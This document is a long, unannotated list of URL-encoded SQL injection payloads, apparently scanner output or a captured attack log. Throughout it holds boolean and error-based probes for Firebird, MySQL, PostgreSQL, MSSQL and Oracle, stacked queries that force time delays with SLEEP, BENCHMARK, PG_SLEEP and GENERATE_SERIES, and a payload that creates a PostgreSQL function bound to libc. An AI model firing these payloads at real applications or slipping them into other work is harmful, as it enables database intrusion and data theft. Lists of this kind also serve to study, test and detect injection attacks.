-5398%22%29%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%28%22WGXi%22%20LIKE%20%22WGXi -2311%22%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%22olQd%22%20LIKE%20%22olQd -2439%25%27%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%27%25%27%3D%27 -5072%25%27%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%27%25%27%3D%27 -6177%25%27%29%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%28%27%25%27%3D%27 -6035%25%27%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%27%25%27%3D%27 -5305%00%27%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%27UmJn%27%3D%27UmJn -1868%00%27%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%27OXTc%27%3D%27OXTc -9474%27%29%20WHERE%204624%3D4624%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 -9212%22%29%20WHERE%205920%3D5920%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 -5207%29%20WHERE%205097%3D5097%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 -2996%27%20WHERE%201339%3D1339%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 -8694%22%20WHERE%208576%3D8576%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 -4998%20WHERE%203820%3D3820%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 %28SELECT%207890%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287890%3D7890%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 %28EXTRACTVALUE%284427%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284427%3D4427%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%29 %28UPDATEXML%287397%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287397%3D7397%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C3656%29%29 %28CAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288656%3D8656%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%29 %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281951%3D1951%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%29 %28SELECT%20CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284060%3D4060%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29 %28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289712%3D9712%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 %28SELECT%205047%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%205047%20WHEN%205047%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%29 1234.5%2C%28SELECT%201411%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281411%3D1411%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%2CEXTRACTVALUE%282530%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282530%3D2530%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 1234.5%2CUPDATEXML%286084%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286084%3D6084%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C3644%29 1234.5%2C%28CAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289849%3D9849%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%29 1234.5%2C%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288226%3D8226%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%29 1234.5%2C%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286036%3D6036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 %28SELECT%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282253%3D2253%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 %28SELECT%20%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284144%3D4144%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 %28SELECT%20CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283115%3D3115%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29 %28SELECT%20CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287773%3D7773%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%20FROM%20DUAL%29 SELECT%20%27%3Amvk%3A%27%7C%7C%28SELECT%20%28CASE%20WHEN%20%288662%3D8662%29%20THEN%201%20ELSE%200%20END%29%29%7C%7C%27%3Apwy%3A%27 SELECT%20%27%3Amvk%3A%27%7C%7C%28CASE%201323%20WHEN%201323%20THEN%201%20ELSE%200%20END%29%7C%7C%27%3Apwy%3A%27%20FROM%20RDB%24DATABASE 1234.5%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%3B%20SELECT%20SLEEP%285%29--%20 1234.5%22%3B%20SELECT%20SLEEP%285%29--%20 1234.5%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%3B%20SELECT%20SLEEP%285%29--%20 1234.5%22%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%22%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%22%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%22%3B%20SELECT%20SLEEP%285%29--%20 1234.5%22%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%22%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%22%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%22%3B%20SELECT%20SLEEP%285%29--%20 1234.5%25%27%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%25%27%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%25%27%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%25%27%3B%20SELECT%20SLEEP%285%29--%20 1234.5%00%27%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%00%27%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%29%20WHERE%202247%3D2247%3B%20SELECT%20SLEEP%285%29--%20 1234.5%22%29%20WHERE%207406%3D7406%3B%20SELECT%20SLEEP%285%29--%20 1234.5%29%20WHERE%209789%3D9789%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%20WHERE%206586%3D6586%3B%20SELECT%20SLEEP%285%29--%20 1234.5%22%20WHERE%204085%3D4085%3B%20SELECT%20SLEEP%285%29--%20 1234.5%20WHERE%205434%3D5434%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%7C%7C%28SELECT%20%27Mfah%27%20FROM%20DUAL%20WHERE%206640%3D6640%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%7C%7C%28SELECT%20%27wpns%27%20WHERE%201221%3D1221%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%2B%28SELECT%20pxGR%20WHERE%204965%3D4965%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%2B%28SELECT%20%27dOeT%27%20WHERE%204824%3D4824%3B%20SELECT%20SLEEP%285%29--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20SLEEP%285%29--%20 1234.5%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%25%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%25%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%25%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%25%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%00%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%00%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%29%20WHERE%206004%3D6004%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%22%29%20WHERE%203512%3D3512%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%29%20WHERE%203173%3D3173%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%20WHERE%206231%3D6231%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%22%20WHERE%202060%3D2060%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%20WHERE%208101%3D8101%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%7C%7C%28SELECT%20%27Hdru%27%20FROM%20DUAL%20WHERE%205283%3D5283%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%7C%7C%28SELECT%20%27lNpV%27%20WHERE%208356%3D8356%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%2B%28SELECT%20RPuL%20WHERE%202216%3D2216%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%2B%28SELECT%20%27rQXJ%27%20WHERE%204939%3D4939%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x67446457%29%29--%20 1234.5%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%22%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%22%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%22%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%22%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%22%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%22%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%22%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%25%27%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%25%27%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%25%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%25%27%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%00%27%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%00%27%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%29%20WHERE%208997%3D8997%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%22%29%20WHERE%208716%3D8716%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%29%20WHERE%201786%3D1786%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%20WHERE%205617%3D5617%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%22%20WHERE%202557%3D2557%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%20WHERE%209342%3D9342%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%7C%7C%28SELECT%20%27CmTx%27%20FROM%20DUAL%20WHERE%207117%3D7117%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%7C%7C%28SELECT%20%27PuEn%27%20WHERE%207178%3D7178%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%2B%28SELECT%20PHzz%20WHERE%209885%3D9885%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%2B%28SELECT%20%27IJmu%27%20WHERE%204250%3D4250%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20PG_SLEEP%285%29-- 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%25%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%25%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%25%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%25%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%00%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%00%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%29%20WHERE%209833%3D9833%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%22%29%20WHERE%208530%3D8530%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%29%20WHERE%209049%3D9049%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%20WHERE%208512%3D8512%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%22%20WHERE%201397%3D1397%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%20WHERE%209693%3D9693%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%7C%7C%28SELECT%20%27CdtZ%27%20FROM%20DUAL%20WHERE%203937%3D3937%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%7C%7C%28SELECT%20%27Wuhy%27%20WHERE%207200%3D7200%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%2B%28SELECT%20Yrhs%20WHERE%201787%3D1787%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%2B%28SELECT%20%27FZAq%27%20WHERE%201814%3D1814%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1234.5%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 